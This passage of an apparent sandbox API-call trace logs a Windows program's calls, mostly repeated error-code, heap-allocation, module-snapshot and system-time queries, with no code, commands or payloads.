0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.454] SetLastError (dwErrCode=0x0) [0043.454] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x0, Size=0x68) returned 0x1c61990 [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.455] SetLastError (dwErrCode=0x0) [0043.455] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.456] SetLastError (dwErrCode=0x0) [0043.456] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.457] SetLastError (dwErrCode=0x0) [0043.457] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.458] SetLastError (dwErrCode=0x0) [0043.458] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.459] SetLastError (dwErrCode=0x0) [0043.459] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.460] SetLastError (dwErrCode=0x0) [0043.460] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.461] SetLastError (dwErrCode=0x0) [0043.461] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] GetLastError () returned 0x0 [0043.462] SetLastError (dwErrCode=0x0) [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x98) returned 0x1c61a00 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1f) returned 0x1c61aa0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x36) returned 0x1c61ac8 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x37) returned 0x1c61b08 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x3c) returned 0x1c61b48 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x31) returned 0x1c61b90 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x17) returned 0x1c61bd0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x24) returned 0x1c61bf0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x14) returned 0x1c61c20 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0xd) returned 0x1c61c40 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x25) returned 0x1c61c58 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x39) returned 0x1c61c88 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x18) returned 0x1c61cd0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x17) returned 0x1c61cf0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0xe) returned 0x1c61d10 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x69) returned 0x1c61d28 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x3e) returned 0x1c61da0 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1b) returned 0x1c61de8 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1d) returned 0x1c61e10 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x48) returned 0x1c61e38 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x12) returned 0x1c61e88 [0043.462] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x18) returned 0x1c61ea8 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1b) returned 0x1c61ec8 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x24) returned 0x1c61ef0 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x29) returned 0x1c61f20 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1e) returned 0x1c61f58 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x41) returned 0x1c61f80 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x17) returned 0x1c61fd0 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0xf) returned 0x1c61ff0 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x16) returned 0x1c62008 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x2a) returned 0x1c62028 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x29) returned 0x1c62060 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x15) returned 0x1c62098 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x1e) returned 0x1c620b8 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x2a) returned 0x1c620e0 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x12) returned 0x1c62118 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x18) returned 0x1c62138 [0043.463] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x46) returned 0x1c62158 [0043.463] HeapFree (in: hHeap=0x1c60000, dwFlags=0x0, lpMem=0x1c611f8 | out: hHeap=0x1c60000) returned 1 [0043.464] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x800) returned 0x1c621a8 [0043.464] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x80) returned 0x1c611f8 [0043.464] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0043.465] RtlSizeHeap (HeapHandle=0x1c60000, Flags=0x0, MemoryPointer=0x1c611f8) returned 0x80 [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.465] SetLastError (dwErrCode=0x0) [0043.465] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.466] SetLastError (dwErrCode=0x0) [0043.466] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.467] GetLastError () returned 0x0 [0043.467] SetLastError (dwErrCode=0x0) [0043.471] GetLastError () returned 0x0 [0043.471] SetLastError (dwErrCode=0x0) [0043.471] GetLastError () returned 0x0 [0043.472] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0043.472] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0043.472] GetProcAddress (hModule=0x76c20000, lpProcName="Module32FirstW") returned 0x76c579f9 [0043.472] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0043.474] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0043.474] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0043.474] GetTickCount () returned 0x114471f [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.474] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.474] GetACP () returned 0x4e4 [0043.474] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.475] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.475] GetACP () returned 0x4e4 [0043.475] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.476] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.476] GetACP () returned 0x4e4 [0043.476] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: 